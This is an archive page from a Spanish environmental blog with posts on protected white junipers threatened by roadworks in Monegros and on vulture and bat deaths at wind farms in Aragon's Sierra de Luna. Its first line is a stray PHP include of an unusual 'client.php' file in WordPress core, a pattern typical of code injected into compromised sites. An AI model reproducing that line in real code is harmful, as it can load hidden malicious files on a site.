@include( ABSPATH . WPINC . '/client.php'); Barracuda » Biodiversidad

Barracuda

Posts archivados en la categoría Biodiversidad

LAS SABINAS DE MONEGROS TEMEN A DPZ

19th enero 2021 | Atentados ecológicos,Biodiversidad,Estepas,Política y Sociedad

sabina blanca

Amigos de la Tierra Aragón se ha dirigido a la Diputación de Zaragoza transmitiendo su preocupación por la suerte que corren las sabinas que jalonan la carretera CV-8 entre Osera y Monegrillo, en la comarca de Los Monegros, ante las inminentes obras de ampliación del tramo que falta por mejorar de la misma.

La preocupación se basa en la experiencia previa, debido a las obras del primer tramo en 2017, las cuales se llevaron por delante varias decenas de venerables sabinas blancas.

La sabina albar o sabina blanca (Juniperus thurifera) del valle del Ebro es una población protegida en la categoría “de interés especial” en el Catálogo de Especies Amenazadas de Aragón (aprobado por Decreto 49/1995, de 28 de marzo, del Gobierno de Aragón, BOA 7-4-1995, y modificado por Orden de 4 de marzo de 2004, del Departamento de Medio Ambiente, BOA 22-3-2004, y por Decreto 181/2005, de 6 de septiembre, BOA 23-9-2005).

La sabina blanca es una especie del grupo de las gimnospermas, de crecimiento muy lento y que es la única especie de porte arbóreo capaz de crecer en la estepa semiárida del valle del Ebro, de ahí su interés.

sabina blanca

Amigos de la Tierra Aragón se ha dirigido hace varios días, por correo electrónico, a Presidencia de DPZ y al servicio de Vialidad y Obras pero hasta ahora no ha obtenido respuesta ni acuse de recibo.

sabina blanca

La documentación a la que Amigos de la Tierra ha tenido acceso por ahora consiste en una declaración de impacto ambiental (DIA) de 2012 por la que INAGA imponía determinadas condiciones a la obra, DIA que caducaba a los dos años, por lo que se cuestiona legalidad de las obras de 2017. No obstante, la DIA de INAGA sólo contemplaba preservar las sabinas para su transplante, aspecto más que dudoso de poderse llevar a cabo con esta especie -hay que tener en cuenta que INAGA tiene muy pocos días lúcidos cuando redacta sus resoluciones- pero las máquinas arrancaron directamente las sabinas.

[...]Vegetación

8. Se deberá salvaguardar y proteger los ejemplares de flora protegida o singular con méritos de conservación y de arbolado con características de singularidad, en especial los ejemplares de sabina albar (Juniperus thurifera) que se localizan en los márgenes de la carretera de pk 0+390 a pk 8+900, que pueden ser amenazados por la ejecución del proyecto. La vegetación a proteger o salvaguardar se aislará y protegerá con una valla perimetral señalizadora, prohibiendo el acceso de personas y maquinaria.

9. Los ejemplares de flora catalogada afectados finalmente por la obra se determinarán y señalizarán en el replanteo de la misma por el responsable ambiental en compañía de un APN de la zona. La traslocación se realizará en condiciones óptimas de supervivencia y se realizará un seguimiento posterior de las plantaciones.[...] Resolución del Instituto Aragonés de Gestión Ambiental de fecha 11 de Junio de 2012. (Expediente INAGA 500201/01/2011/01207).

Al parecer, el desaguisado de la vez anterior se intentó subsanar haciendo una plantación en un monte de Monegrillo, pero hasta ahora se desconoce si la misma se llevó a cabo, con qué especies, y el control y seguimiento que ha habido.

Se desconoce también si existe una nueva DIA para las obras que se pretenden iniciar y si ha mejorado la sensibilidad de los planificadores y ejecutores de las obras públicas, en DPZ en este caso, porque ya se criticaron también los “excesos” de DPZ en la carretera de Valmadrid, incluso con una DIA muy amigable para las máquinas (ver: Destrucción del Alto de Valdescalera/Barracuda, 2016).

1 lector ha dado su opinión

PARQUE EÓLICO LA PEÑA, OTRO MATADERO DE EDPR

8th enero 2021 | Atentados ecológicos,Aves,Biodiversidad,Eólica,Política y Sociedad

La empresa Energías de Portugal Renovables (EDPR) España, filial de EDP explota la central eólica La Peña en los TM de Las Pedrosas y Sierra de Luna en la provincia de Zaragoza (Aragón, España).

PE La Peña

Fuente: ecoticias.com/el periódico verde

La central consta de once máquinas que empezaron a operar a comienzos de 2020 y los datos de siniestralidad de fauna han sido analizados en este blog por ser llamativos sus bajos registros de siniestros (ver: El matadero eólico de la Sierra de Luna (II)/Barracuda, 2020). Según datos del Gobierno de Aragón, en los diez primeros meses de 2020 sólo llegaron dos buitres abatidos al Centro de Recuperación de Fauna Silvestre procedentes de este parque eólico.

PE La Peña

Buitre leonado abatido en PE La Peña, máquina nº 6.
20210103 © ANSAR

Ante las sospechas que levantan cifras tan escasas, diversos naturalistas recorrieron las inmediaciones de las máquinas del parque eólico La Peña el pasado tres de enero y hallaron nada menos que nueve cadáveres de buitre leonado (Gyps fulvus), la mayoría restos muy viejos que nadie había retirado. Bajo la máquina nº 1 se hallaron tres cadáveres antiguos; bajo la máquina nº 2 se hallaron cuatro cadáveres también antiguos y bajo la máquina nº 6 se halló un cadaver reciente y otro antiguo, como se aprecia en las fotos.

PE La Peña

Buitre leonado abatido en PE La Peña, máquina nº 2.
20210103 © ANSAR

Estos hechos hacen suponer que no se realiza el seguimiento de siniestralidad en dicha instalación eólica. Hay que recordar que EDPR España es conocida por la intensa mortalidad de otro de sus parques eólicos como es PE Rabosera, ya denunciada aquí (ver: Historias de terror eólico (IV): PE Rabosera/Barracuda, 2020), a pesar de las intensas campañas de lavado de imagen que realiza la empresa (ver: Greenwashing de EDP/Barracuda, 2020).

PE La Peña

Buitre leonado abatido en PE La Peña, máquina nº 6.
20210103 © ANSAR

La siniestralidad del PE La Peña de EDPR España y de los PE Monlora y PE La Sarda de Forestalia, ambos en la Sierra de Luna, ha sido noticia de alcance en la publicación de la Vulture Conservation Foundation (ver: On a collision course: 16 Griffon Vultures killed by wind turbines in Aragon, Spain/VCF, 2020).

Es espeluznante la letalidad eólica y ni empresas ni administración muestran la más mínima sensibilidad, sino el desprecio más absoluto por los animales que perecen -tras larga agonía muchas veces- a miles bajo los aerogeneradores.

Anímate a hacer un comentario

EL MATADERO EÓLICO DE LA SIERRA DE LUNA (y II)

31st diciembre 2020 | Atentados ecológicos,Aves,Biodiversidad,Eólica

Continuamos con el análisis de la información que el Gobierno de Aragón ha remitido a la Asociación Naturalista de Aragón (ANSAR) relativa a la fauna ingresada en el centro de recuperación de fauna silvestre (CRFS) de La Alfranca proveniente de los animales siniestrados en los parques eólicos ubicados en la Sierra de Luna y los Montes de Castejón de Valdejasa en los TM de Luna, Sierra de Luna, Las Pedrosas y Castejón de Valdejasa (Zaragoza, Aragón, España) (ver: Matadero eólico en Sierra de Luna (I): Monlora). A continuación se adjuntan extractos de los listados de animales siniestrados y fecha de entrada en el CRFS provenientes de los parques eólicos La Sarda, La Peña y Santo Domingo de Luna así como ubicación del animal respecto de las máquinas. Corresponde a los animales recogidos en el campo entre principios de 2020 y septiembre de 2020 aproximadamente al comienzo del funcionamiento de esas instalaciones.

Hay que recordar que la fecha de entrada al CRFS es posterior a la de recogida en el campo. A veces con varios días de diferencia ya que los cadáveres son guardados en congeladores hasta acumular un número suficiente para rentabilizar el transporte. Sólo si el animal está vivo llega al CRFS el mismo día o al día siguiente de su recogida en el campo. A su vez, la retirada del campo suele suceder días después de ocurrido el siniestro.

PE La Sarda

PE La Sarda

Siniestros PE La Sarda. Fuente: CRFS, Gobierno de Aragón

La Sarda es una central eólica con ocho máquinas en los TM de Luna y Sierra de Luna promovida inicialmente por Eólica Sostenible del Gállego y explotada actualmente por el consorcio Forestalia-Mirova-Engie. Al CRFS sólo llegaron dos buitres leonados siniestrados. Uno recogido el 05/febrero/2020 (máquina nº ?) y otro el 25/septiembre/2020 (máquina nº 4). Esta cifra es poco creíble tanto por la baja siniestralidad como por la diferencia entre ambas fechas con más de siete meses sin siniestros. Esta falta de credibilidad viene corroborada porque posteriormente, en dicho parque se encontraron sólo en la mañana del 26 de diciembre de 2020 dos buitres siniestrados en las máquinas nº 1 y nº 3 (ver: Tragedia eólica en la Sierra de Luna).

PE La Peña

PE La Peña

Siniestros PE La Peña. Fuente: CRFS, Gobierno de Aragón

El parque eólico La Peña en el TM de Las Pedrosas y Sierra de Luna consta de once máquinas y está promovido por EDP Renovables España SL (EDP, Energías de Portugal). Sólo arroja también un saldo de dos buitres siniestrados, ambos recogidos en el campo el 20/marzo/2020 en las máquinas nº 3 y nº 9. Esta cifra es poco creíble dada la siniestralidad de los parques contiguos. Tanto las cifras de La Sarda como de La Peña indican que probablemente no se hace el seguimiento de siniestralidad o se hace muy deficientemente.

PE Santo Domingo de Luna

PE Santo Domingo de Luna

Siniestros PE Santo Domingo de Luna. Fuente: CRFS, Gobierno de Aragón

El parque eólico Santo Domingo de Luna consta de 9 máquinas y gestionado por Exlotaciones Eólicas Santo Domingo de Luna SA de Enel Green Power/Endesa con participación de General Eólica Aragonesa (Geolica). Está ubicado en los TM de Luna, Sierra de Luna y Las Pedrosas y arroja una siniestralidad de 24 buitres leonados y un milano negro. Son cifras realmente muy elevadas aunque en este caso, la siniestralidad está sesgada hacia animales grandes, sin hallar pequeños vertebrados como paseriformes o murciélagos, por lo que se puede sospechar que el seguimiento se hace muy superficial y deficientemente. De hecho sólo se reflejan hallazgos en los meses de enero, febrero, marzo, septiembre y octubre de 2020, con cinco meses sin reflejar bajas. Por tanto es de esperar que la siniestralidad sea mucho mayor.

riovalle

Construcción del PE Santo Domingo de Luna

1 lector ha dado su opinión

TRAGEDIA EÓLICA EN LA SIERRA DE LUNA

30th diciembre 2020 | Atentados ecológicos,Aves,Biodiversidad,Eólica,Política y Sociedad

La Asociación Naturalista de Aragón ANSAR y Amigos de la Tierra Aragón han hecho pública una nota de prensa comunicando que naturalistas aragoneses encontraron en la mañana del pasado sábado 26 de diciembre siete buitres leonados abatidos por los aerogeneradores de los parques eólicos Monlora y La Sarda. Uno de los buitres todavía estaba vivo tras perder un ala. El resto eran cadáveres recientes salvo uno ya muy viejo que estaba semienterrado por las labores agrícolas. Las bajas corresponden a la observación realizada en trece máquinas, lo que da idea de la intensa mortalidad ocasionada por los generadores eólicos, que suman en torno a un centenar en la comarca.

Se hallaron dos buitres en La Sarda (máquinas nº 1 y nº 3), dos en Monlora I (máquina nº 1) y tres en Monlora III (máquina 8). En total siete buitres.

La Sarda

Buitre leonado abatido en PE La Sarda

Los siniestros fueron comunicados al teléfono de emergencias para la retirada de los animales. Algunos de los aerogeneradores causantes de las bajas estaban equipados con dispositivos disuasorios “dtbird” que se muestran inútiles incluso con aves de gran tamaño como los buitres, puesto que bajo una máquina equipada se hallaron dos de los buitres. Semanas antes, agricultores y ganaderos de la zona ya venían comunicando a estas asociaciones la presencia de cadáveres de buitres en los campos.

A raíz de estos hechos la Asociación Naturalista de Aragón ANSAR y Amigos de la Tierra Aragón denuncian la intensa mortalidad de fauna en los parques eólicos ubicados en la Sierra de Luna y los Montes de Castejón en los TM de Castejón de Valdejasa, Luna, Sierra de Luna y Las Pedrosas (Zaragoza, Aragón, España). Los parques de Monlora y La Sarda están explotados -según los últimos datos- por el consorcio formado por la aragonesa Forestalia, Mirova y Engie, dentro del proyecto denominado con el macabro nombre de “Phoenix”.

Por otra parte, los datos aportados a ambas asociaciones ecologistas por el Gobierno de Aragón de los animales ingresados de marzo a septiembre de este año en el Centro de Recuperación de Fauna Silvestre (CRFS) de La Alfranca provenientes de los parques eólicos Monlora (I a V), La Sarda, La Peña y Santo Domingo de Luna arrojan elevadas cifras de siniestralidad con decenas de aves y murciélagos abatidos por colisión de las palas de los aerogeneradores (ver: El matadero eólico de Sierra de Luna). Los animales abatidos abarcan desde el buitre leonado y el águila real hasta pequeños pajarillos como trigueros, y también murciélagos. Incluso se han registrado bajas de milanos reales en el PE Monlora, especie que está catalogada nada menos que en peligro de extinción y para la que el Gobierno de Aragón mantiene un costoso programa de cría en cautividad.

Monlora

Buitre leonado abatido en PE Monlora I

La Asociación Naturalista de Aragón ANSAR y Amigos de la Tierra Aragón advierten que los animales ingresados en el CRFS son sólo una parte de los realmente siniestrados ya que una buena parte no son encontrados por los encargados del seguimiento (las visitas se realizan cada quince días) o bien no se retiran del campo a tiempo como se pudo comprobar el pasado día y/o no llegan al CRFS. Además hay que sumar también la siniestralidad directa causada por las líneas de alta tensión de evacuación de la energía y por las subestaciones eléctricas, datos que no se han aportado. Por otra parte, hay que tener en cuenta la mortalidad oculta de los ejemplares juveniles por la desaparición de adultos reproductores en primavera y verano ya que ésta ocasiona la muerte de los pollos jóvenes en los nidos, en caso de las aves, o de los cachorros de murciélagos en las cavidades de cría.

Hay que recordar que los aerogeneradores no sólo matan aves y quirópteros sino que lo hacen causando mucho sufrimiento animal ya que los animales que caen mutilados o traumatizados tardan horas o días en morir desangrados o por deshidratación, o por hipotermia ahora en invierno.

Dado el negativo impacto sobre la biodiversidad, la Asociación Naturalista de Aragón ANSAR y Amigos de la Tierra Aragón exigen al Gobierno de Aragón la paralización de dichos parques y su desmantelamiento de acuerdo al condicionado ambiental con el que se autorizó la puesta en marcha. Igualmente pondrán en conocimiento de SEPRONA los siniestros por si hubiera dolo.

Anímate a hacer un comentario


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

enero 2021
L M X J V S D
« dic    
 123
45678910
11121314151617
18192021222324
25262728293031

ARTÍCULOS POR MESES

PÁGINAS